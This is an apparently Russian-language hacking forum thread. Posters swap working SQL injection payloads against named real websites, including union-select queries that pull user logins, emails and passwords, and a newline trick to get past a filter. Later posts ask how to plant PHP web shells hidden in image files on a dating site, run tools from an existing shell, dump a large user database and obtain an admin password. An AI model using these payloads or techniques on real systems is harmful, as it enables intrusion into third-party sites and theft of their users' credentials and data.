Netcat CMS -1+union+select+1,user_id+from+User+--+ показывает -1+union+select+1,unhex(hex(password))+from+User+--+ показывает -1+union+select+1,password+from+User+--+ показывает -1+union+select+1,login+from+User+--+ НЕ показывает -1+union+select+1,unhex(hex(login))+from+User+--+ НЕ показывает -1+union+select+1,aes_decrypt(aes_encrypt(login))+from+User+--+ НЕ показывает Ни Email, Login, ForumName, FullName не хочет показывать как можно это обойти?
не хочет показывает только login, не подошел можент надо конвертировать str в int? есть ли такая функция
Code: On /index.php?name=1%00%27&file=faq&p=3098 While executing query "SELECT mid, title, custom_title, active, view, blocks, version FROM cms_modules WHERE LOWER(title)='1�''" the following error occured: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1' at line 1 In: /home/anonimka/public_html/index.php on line: 73 Что за ошибка ? можно как-нибудь раскрутить ?
Ошибка синтаксиса MySQL. По всей видимости, можно. Как раскрутить, написано здесь http://forum.antichat.ru/thread43966.html П.С. Зачем там нуллбайт?
+union+select+1,cast(version()+as+binary),3,4,5,6 or +union+select+1,convert(version()+using+latin1),3,4,5,6 or /*!...*/
помогите разобратся, невогу вывести информацию из табле схема, постоянно пишет ошибку http://nicedave.com/content.php?id=6659+union+select+1,2,3
privateurl.com в поле логин хз как там раскрутить помогите и вообще кривая какаят +--+ не робит а /* робит чо эт знач помогите кста через union можно ток select выполнять или апдэйт, delete, insert тож
Так работает: Code: http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5-- А так нет: Code: http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios-- Почему? =\
а при чем тут сама уязвимость, фильтруется на хосте, только не from, а select from, обходится так: Code: http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT%0a1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
uname -a: Windows NT WINCTRL-7IBNPUN 6.1 build 7600 ((null)) i586 Safe-mode: ON (secure) C:\ drwxrwxrwx (это пхп шелл) Можно как-то запускать радмин или что-то?
Вопрос простой-заливаю шелл в картинку при помощи Notepad, затем ставлю её в датинге как основное фото(админом не спалилось) .Далее копирую урл картинки и шелл нифига не открывается- почему? Заливаю как shell.php.jpg. Shell.jpg.php не прокатывает. Может какой другой прогой шелл в картинку вливать? Если делать просто шелл без изображения т.е. просто конвертировать название шелла- то вообще не прокатывает. http://okfreedating.net/static/i/1/10/A8/t_u594088_399_shell.php.jpg либо так http://okfreedating.net/photo.php?user_id=594088&album_id=1¤t=0 , а шелл не открывается-((( И ещё. Зная на взломанном сайте таблицы,номера колонок и т.д.,т.е. полный путь до нужной базы,но опять же без админки, чем сдампить эту базу? Пытался сдампить Havij 1.14, но слишком долго-база миллионник-) ICQ 620198086 http://admin.okfreedating.net/login.php- админка профиль где залит шелл: vlamalijj@Fdfnfh И ещё- как получить пароль админа? Просьба не пинать-) Учусь
